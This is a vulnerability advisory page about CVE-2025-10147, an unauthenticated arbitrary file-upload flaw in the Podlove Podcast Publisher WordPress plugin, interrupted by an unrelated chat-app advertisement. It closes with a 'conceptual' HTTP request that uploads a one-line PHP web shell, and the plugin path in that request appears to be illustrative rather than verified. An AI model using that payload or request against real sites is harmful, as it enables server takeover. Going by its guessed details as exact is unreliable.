Overview
The Podlove Podcast Publisher plugin for WordPress, widely used for publishing podcasts, contains a critical vulnerability that could potentially allow remote code execution. Identified as CVE-2025-10147, this vulnerability affects all versions up to and including 4.2.6. The flaw lies in the lack of sufficient file type validation in the ‘move_as_original_file’ function, allowing attackers to upload arbitrary files to the server of the affected site.
This vulnerability is significant due to its potential impact on a broad range of WordPress sites using this plugin, and underscores the importance of plugin security in the broader context of website security. The fact that the vulnerability can be exploited by unauthenticated attackers makes it even more critical.
Vulnerability Summary
CVE ID: CVE-2025-10147
Severity: Critical (CVSS: 9.8)
Attack Vector: Network
Privileges Required: None
User Interaction: None
Impact: Potential system compromise or data leakage
Affected Products
Escape the Surveillance Era
Most apps won’t tell you the truth.
They’re part of the problem.
Phone numbers. Emails. Profiles. Logs.
It’s all fuel for surveillance.
Ameeba Chat gives you a way out.
- • No phone number
- • No email
- • No personal info
- • Anonymous aliases
- • End-to-end encrypted
Chat without a trace.
Product | Affected Versions
Podlove Podcast Publisher Plugin for WordPress | Up to and including 4.2.6
How the Exploit Works
The vulnerability resides within the ‘move_as_original_file’ function of the Podlove Podcast Publisher plugin. This function lacks sufficient validation of file types before moving uploads to their destination on the server. As a result, an attacker can exploit this function by uploading a malicious file, which then resides on the server. Given the correct conditions, this file could be executed, leading to a remote code execution vulnerability.
Conceptual Example Code
The following is a conceptual example of how an attacker might exploit this vulnerability using an HTTP POST request to upload a malicious file:
POST /wp-content/plugins/podlove-podcasting-plugin-for-wordpress/lib/modules/asset_validation/move_as_original_file.php HTTP/1.1
Host: target.example.com
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxkTrZu0gW
------WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Disposition: form-data; name="file"; filename="exploit.php"
Content-Type: application/php
<?php echo shell_exec($_GET['cmd']); ?>
------WebKitFormBoundary7MA4YWxkTrZu0gW--This example attempts to upload a PHP file that would execute arbitrary shell commands when accessed with the appropriate ‘cmd’ parameter in the query string.
Note that this is a conceptual example and actual exploitation would depend on the specific configuration and state of the targeted server.
